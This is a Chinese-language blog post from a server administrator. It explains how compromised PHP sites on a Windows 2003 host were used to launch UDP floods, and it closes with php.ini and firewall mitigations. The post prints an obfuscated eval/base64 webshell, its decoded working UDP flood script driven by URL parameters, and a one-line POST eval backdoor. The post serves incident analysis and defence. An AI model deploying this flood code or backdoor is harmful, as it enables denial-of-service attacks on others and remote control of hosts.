win2003遭受udp攻擊致使帶寬佔用很大

朋友國外的機器帶寬忽然跑的很大,網站很少,後來講是把對外的udp端口給封了就行了.後來在國內一個放企業站上面也出現過如此的狀況.
 
後來發如今一個網站裏面發現一個加密的.解密後看到很熟悉的 udp 莫非有關係?.果真 也有朋友遇到這樣的狀況,看來封禁對外udp是很必要的, 

關於近期一些服務器遭受UDP攻擊的說明 
近來我有一兩臺服務器顯示常常受到udp攻擊 
致使服務器帶寬佔用到100%，用華盾查流量佔用也沒法查到具體是哪一個站被攻擊了，起初覺得是cc攻擊，由於中止了iis帶寬就爲0了，其實否則，都是部分用戶被入侵致使的 
下面我想說一下被入侵的原理 
用戶程序中的一個php頁面的原代碼: 

<?php 
/* 
gl 
*/ 
eval(gzinflate(base64_decode(' 
DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw 
6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLb 
VkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGY 
ibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4 
wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG 
3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci1 
3dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCw 
xiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOu 
SJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Aw 
e8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnu 
bV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3c 
hsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));

通過N次解密後的代碼： 

<?php 
$packets = 0; 
$ip = $_GET[\'ip\']; 
$rand = $_GET[\'port\']; 
set_time_limit(0); 
ignore_user_abort(FALSE); 
$exec_time = $_GET[\'time\']; 
$time = time(); 
print \"Flooded: $ip on port $rand <br><br>\"; 
$max_time = $time+$exec_time; 


for($i=0;$i<65535;$i++){ 
$out .= \"X\"; 
} 
while(1){ 
$packets++; 
if(time() > $max_time){ 
break; 
} 
$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5); 
if($fp){ 
fwrite($fp, $out); 
fclose($fp); 
} 
} 
echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\"; 
?> 
<?php eval($_POST[ddos])?>

工做原理：  先把你代碼放到一個正常的網頁中.  經過url傳遞IP和端口以udp的方式打開.傳遞文件到服務器寫出.  這樣服務器就中招了.  也就是服務器顯示udp攻擊，帶寬佔用很是之嚴重，基本是100%，通常徘徊在97%-99%之間  解決方案：  在php.ini中限制php用網絡。  在php.ini裏設其值爲Off  allow_url_fopen = Off  而且:  ;extension=php_sockets.dll  前面的;號必定要有,意思就是限制用sockets.dll  而後重啓IIS  我沒關這個函數,有的程序須要貌似,直接把udp出站端口給封了.